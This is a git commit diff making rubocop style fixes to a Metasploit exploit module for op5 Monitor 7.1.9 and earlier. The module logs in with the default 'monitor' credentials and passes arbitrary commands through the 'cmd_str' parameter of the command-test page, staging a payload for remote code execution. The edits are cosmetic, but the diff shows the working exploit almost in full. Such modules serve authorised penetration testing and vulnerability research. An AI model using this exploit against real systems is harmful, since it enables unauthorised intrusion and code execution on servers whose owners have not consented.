rubocop fixes

2016-06-03 17:43:11 -04:00 · 2016-06-03 17:43:11 -04:00 · c2699ef194
parent 68d647edf1
commit c2699ef194
1 changed files with 52 additions and 49 deletions
--- a/modules/exploits/linux/http/op5_config_exec.rb
+++ b/modules/exploits/linux/http/op5_config_exec.rb
@ -6,65 +6,68 @@
 require 'msf/core'

 class MetasploitModule < Msf::Exploit::Remote
-
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'op5 v7.1.9 Configuration Command Execution',
-      'Description' => %q{
-        op5 an open source network monitoring software.
-        The configuration page in version 7.1.9 and below
-        allows the ability to test a system command, which
-        can be abused to run arbitrary code as an unpriv user.
-      },
-      'Author'      =>
-        [
-          'h00die <mike@stcyrsecurity.com>', # module
-          'hyp3rlinx'                        # discovery
-        ],
-      'References'      =>
-        [
-          [ 'URL', 'https://www.exploit-db.com/exploits/39676/' ],
-          [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
-        ],
-      'License'        => MSF_LICENSE,
-      'Platform'       => ['linux', 'unix'],
-      'Privileged'     => false,
-      'DefaultOptions' => { 'SSL' => true },
-      'Targets'        =>
-        [
-          [ 'Automatic Target', { }]
-        ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => 'Apr 08 2016',
-     ))
+    super(
+      update_info(
+        info,
+        'Name'        => 'op5 v7.1.9 Configuration Command Execution',
+        'Description' => %q(
+          op5 an open source network monitoring software.
+          The configuration page in version 7.1.9 and below
+          allows the ability to test a system command, which
+          can be abused to run arbitrary code as an unpriv user.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # module
+            'hyp3rlinx'                        # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39676' ],
+            [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['linux', 'unix'],
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Apr 08 2016'
+      )
+    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
        OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
-        OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
-      ], self.class)
+        OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
+      ], self.class
+    )
  end

-  def check()
+  def check
    begin
-      res = send_request_cgi({
+      res = send_request_cgi(
        'uri'       => datastore['TARGETURI'],
-        'method'    => 'GET',
-      })
+        'method'    => 'GET'
+      )
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      /Version: (?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+\|/ =~ res.body

-      if version_high && version_med && version_low &&\
-         version_high.to_i <= 7 &&\
-         version_med.to_i <= 1 &&\
+      if version_high && version_med && version_low && \
+         version_high.to_i <= 7 && \
+         version_med.to_i <= 1 && \
         version_low.to_i <= 9
-        vprint_good("Version Detected: #{[version_high, version_med, version_low].join(".")}")
-        Exploit::CheckCode::Vulnerable
+        vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}")
+        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
@ -76,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
  def exploit
    execute_cmdstager(
      :flavor  => :echo,
-      :nodelete => true,
+      :nodelete => true
    )
  end

@ -85,21 +88,21 @@ class MetasploitModule < Msf::Exploit::Remote
      # To manually view the vuln page, click Manage > Configure > Commands.
      # Click the "Test this command" button to display the form we abuse.

-      #login
+      # login
      login_data = 'csrf_token='
      login_data << "&username=#{datastore['USERNAME']}"
      login_data << "&password=#{datastore['PASSWORD']}"

-      res = send_request_cgi({
+      res = send_request_cgi(
        'uri'       => "#{datastore['TARGETURI']}monitor/index.php/auth/login?uri=tac%2Findex",
        'method'    => 'POST',
        'data'      => login_data
-      })
+      )

      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
      cookie = res.get_cookies
-      #exploit
-      res = send_request_cgi({
+      # exploit
+      res = send_request_cgi(
        'uri'       => "/monitor/op5/nacoma/command_test.php",
        'method'    => 'GET',
        'cookie'    => cookie,
@ -107,9 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'cmd_str' => cmd
        }
-      })
+      )

-      #success means we hang our session, and wont get back a response
+      # success means we hang our session, and wont get back a response
      if res
        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
        fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/